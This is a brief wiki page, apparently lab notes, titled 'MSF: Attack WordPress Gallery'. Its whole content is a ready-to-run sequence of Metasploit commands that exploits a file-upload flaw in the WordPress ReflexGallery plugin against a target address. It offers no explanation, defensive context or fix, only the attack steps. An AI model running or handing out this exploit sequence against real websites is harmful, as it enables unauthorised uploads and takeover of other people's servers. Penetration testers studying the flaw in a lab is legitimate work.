MSF: Attack WordPress Gallery

From OnnoWiki
Revision as of 05:16, 30 July 2020 by Onnowpurbo (talk | contribs) (Created page with "Attack ReflexGallery use exploit/unix/webapp/wp_reflexgallery_file_upload set RHOST 192.168.12.120 set RPORT 80 set TARGETURI /wordpress/ run")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Attack ReflexGallery

use exploit/unix/webapp/wp_reflexgallery_file_upload
set RHOST 192.168.12.120
set RPORT 80
set TARGETURI /wordpress/
run